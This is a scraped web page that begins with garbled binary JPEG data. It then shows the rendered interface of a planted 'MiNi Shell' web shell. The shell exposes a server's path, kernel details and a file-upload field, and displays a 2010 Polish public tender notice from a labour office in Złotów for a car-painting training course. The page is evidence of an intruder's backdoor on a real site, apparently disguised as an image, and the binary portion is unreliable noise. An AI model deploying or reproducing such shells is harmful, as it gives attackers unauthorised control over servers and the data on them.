JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100624/182398-N-2010.html

<p class="kh_header"><b>Złotów: Lakiernik samochodowy</b><br>
<b>Numer ogłoszenia: 182398 - 2010; data zamieszczenia: 24.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Kolejowa 11, 77-400 Złotów, woj. wielkopolskie, tel. 067 2635434, faks 067 2635434.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.zlotow.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Lakiernik samochodowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia 
p.n. Lakiernik samochodowy dla 15 osób bezrobotnych. Miejsce realizacji szkolenia: 
a) zajęcia teoretyczne: miasto Złotów, b) zajęcia praktyczne: zakłady blacharsko - lakiernicze na terenie powiatu złotowskiego. Jeżeli zajęcia praktyczne będą odbywały się poza miastem Złotów, Wykonawca zapewni uczestnikom szkolenia transport do miejsca odbywania tych zajęć oraz powrót do miasta Złotowa. 
Termin realizacji zamówienia: lipiec - sierpień  2010r.	
Czas trwania szkolenia: 159 godzin zegarowych tj. 24 dni robocze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków określonych w SIWZ będzie dokonywana przez 
Zamawiającego na podstawie oświadczeń i dokumentów, które muszą dostarczyć 
Wykonawcy zgodnie z SIWZ. Ocena spełnienia warunków będzie dokonywana 
przy  zastosowaniu kryterium spełnia  nie spełnia. Nie spełnienie choćby 
jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków określonych w SIWZ będzie dokonywana przez 
Zamawiającego na podstawie oświadczeń i dokumentów, które muszą dostarczyć 
Wykonawcy zgodnie z SIWZ. Ocena spełnienia warunków będzie dokonywana 
przy  zastosowaniu kryterium spełnia  nie spełnia. Nie spełnienie choćby 
jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zapewnić salę szkoleniową o odpowiedniej powierzchni, spełniającą
      wymagania ergonomiczne i bhp, w której odbywać się będzie szkolenie w 
      zakresie zajęć teoretycznych wyposażoną w odpowiednią ilość miejsc 
      i stolików, dla każdego uczestnika odrębne miejsce tj. 15 stanowisk 
      szkoleniowych oraz zapewnić  wyposażenie w środki dydaktyczne tj. tablicę, 
      flipchart, projektor multimedialny itp.
   Pomieszczenia, w których odbywać się będzie szkolenie muszą być
   oznaczone poprzez wywieszenie plakatu, tablicy informacyjnej, naklejki 
   lub innego rodzaju materiału zawierającego dwa podstawowe logotypy: 
   Logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z 
   dwoma podpisami oraz informację o realizowaniu szkolenia 
   współfinansowanego ze środków Unii Europejskiej w ramach 
   Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi 
   oznaczenia projektów w ramach Programu Operacyjnego Kapitał 
   Ludzki, (informacje: www.efs.gov.pl),
    2. Zapewnić odpowiednie miejsce do realizacji części praktycznej 
          wyposażone co najmniej w agregaty malarskie, pistolety lakiernicze, szlifierko - polerki, kompresor, narzędzia do oczyszczania powierzchni, suszarki, farby, lakiery itp., tak aby każdy uczestnik mógł odbyć część praktyczną 
         szkolenia. Zajęcia praktyczne muszą odbywać się w zakładach blacharsko - 
          lakierniczych na terenie powiatu złotowskiego.
    Używane materiały, sprzęt, urządzenia itp. wykorzystywane przy 
    realizacji szkolenia muszą być zgodne z normami polskimi, posiadać 
   stosowne atesty, aprobaty techniczne, certyfikaty i dopuszczenia oraz być 
   zgodne z zaleceniami inspektorów nadzoru,
                     3. Dysponować  zapleczem sanitarnym dla uczestników kursu.
Ocena spełnienia warunków określonych w SIWZ będzie dokonywana przez 
Zamawiającego na podstawie oświadczeń i dokumentów, które muszą dostarczyć 
Wykonawcy zgodnie z SIWZ. Ocena spełnienia warunków będzie dokonywana 
przy  zastosowaniu kryterium spełnia  nie spełnia. Nie spełnienie choćby 
jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wskazać do realizacji  szkolenia wykładowców o odpowiednim poziomie 
wiedzy i doświadczenia w zakresie poszczególnych zagadnień szkolenia,
a) minimum jednego wykładowcę z wykształceniem wyższym magisterskim w zakresie psychologii pracy,
b) minimum jednego wykładowcę z wykształceniem wyższym magisterskim technicznym,
c) minimum jednego wykładowcę z uprawnieniami do prowadzenia szkolenia w zakresie bezpieczeństwa i higieny pracy,
d) łącznie minimum 3  wykładowców,
e) kadra dydaktyczna musi posiadać minimum dwuletni staż zawodowy w zakresie prowadzonych zajęć szkoleniowych, 
2. W przypadku zdarzeń losowych zapewnić zastępstwo wykładowców 
      wskazanych w ofercie.
      Wykładowcy wskazani na zastępstwo muszą posiadać kwalifikacje 
       i  doświadczenie przynajmniej równe określonym w pkt 1
Ocena spełnienia warunków określonych w SIWZ będzie dokonywana przez 
Zamawiającego na podstawie oświadczeń i dokumentów, które muszą dostarczyć 
Wykonawcy zgodnie z SIWZ. Ocena spełnienia warunków będzie dokonywana 
przy  zastosowaniu kryterium spełnia  nie spełnia. Nie spełnienie choćby 
jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków określonych w SIWZ będzie dokonywana przez 
Zamawiającego na podstawie oświadczeń i dokumentów, które muszą dostarczyć 
Wykonawcy zgodnie z SIWZ. Ocena spełnienia warunków będzie dokonywana 
przy  zastosowaniu kryterium spełnia  nie spełnia. Nie spełnienie choćby 
jednego warunku, skutkować będzie wykluczeniem Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu wykazania posiadania uprawnień do wykonywania działalności lub czynności:
- potwierdzenie o wpisie do Rejestru Instytucji Szkoleniowych  prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na  siedzibę instytucji szkoleniowej zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji  szkoleniowych (Dz. U. z 2004r. Nr 236, poz. 2365) aktualne na rok, w którym Wykonawca ubiega się o zamówienie.
2. W celu wykazania posiadania wiedzy i doświadczenia oraz dysponowania  odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji, doświadczenia i wykształcenia           niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez           nich czynności w formie załącznika Nr 5 do SIWZ, 
b) informacje o podstawie do dysponowania tymi osobami wraz z ich zgodą na przetwarzanie ich danych osobowych w zakresie niezbędnym do ubiegania się przez Wykonawcę o udzielenie zamówienia publicznego w formie załącznika Nr 6 do SIWZ tj. zgoda na prowadzenie zajęć i przetwarzanie danych osobowych, 
c) opis miejsca realizacji szkolenia teoretycznego i praktycznego oraz warunków lokalowych z wykazem pomieszczeń, sprzętu, narzędzi, materiałów i innych urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami, co stanowi załącznik Nr 7 do SIWZ.
3. Do oferty Wykonawca musi dołączyć:
1)	Formularz ofertowy  stanowiący załącznik Nr 1 do SIWZ,
2)	szczegółowy preliminarz kosztów usługi szkoleniowej zawierający przede wszystkim:
a)	wydatki związane z wynajmem ( użytkowaniem) pomieszczeń,
b)	wydatki związane z personelem (wykładowcy, instruktorzy), 
c)	wydatki związane z zakupem materiałów szkoleniowych i środków ochrony osobistej,
d)	wydatki i koszty związane z uczestnictwem w szkoleniu (ubezpieczenie NW),
e)	wydatki i koszty związane z dowozem uczestników szkolenia na zajęcia praktyczne i z powrotem,
f)	inne wydatki np. energia elektryczna, woda, wydatki administracyjno-biurowe związane z obsługą szkolenia itp.,
g)	kalkulację kosztu jednostkowego (koszt szkolenia 1 osoby i koszt osobogodziny szkolenia),
3)	szczegółowy harmonogram szkolenia z podziałem na godziny z wyróżnieniem tematyki szkolenia i wykładowcy,
4)	wzór zaświadczenia potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
5)	wzór ankiety do przeprowadzenia oceny szkolenia,
6)	oświadczenie o zapewnieniu ochrony danych osobowych osób uczestniczących 
w  szkoleniu zgodnie z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (tj. Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.) stanowiące załącznik Nr 2 do SIWZ,
7)	informację o sposobie prowadzenia nadzoru wewnętrznego oraz krótką charakterystykę zawodową wizytatora - specjalisty w dziedzinie tematyki szkolenia, 
8)	informację o zaangażowaniu instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - kwalifikacje kadry dydaktycznej - 30</li>
<li>3 - posiadanie certyfikatu usług w dziedzinie kształcenia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust.1 ustawy Prawo zamówień publicznych na uzasadniony
wniosek Zamawiającego, przewiduje się możliwość dokonania zmian w umowie 
dotyczącej zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia 
okoliczności nie zależnych i niezawinionych przez Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy a powodujących, że wykonanie 
zamówienia nie jest możliwe w liczbie określonej przez Wykonawcę. 
Zmiany postanowień zawartej umowy mogą być także dokonywane w zakresie 
aktualizacji danych Wykonawcy poprzez zmianę w szczególności nazwy 
przedsiębiorstwa, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> pup.zlotow.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Złotowie, ul. Kolejowa 11, 77-400 Złotów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2010 godzina 13:00, miejsce: Powiatowy Urząd Pracy w Złotowie, ul. Kolejowa 11, 77-400 Złotów w     sekretariacie - I piętro, w godzinach urzędowania tj. od poniedziałku do piątku
w godz. 7.30-15.30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  pt.  Aktywność drogą do zatrudnienia czyli od A do Z Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1., Poprawa dostępu do zatrudnienia oraz wspieranie aktywności  zawodowej w rejonie, Poddziałanie 6.1.3. Poprawa zdolności do zatrudnienia oraz podnoszenie  poziomu aktywności zawodowej osób bezrobotnych w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com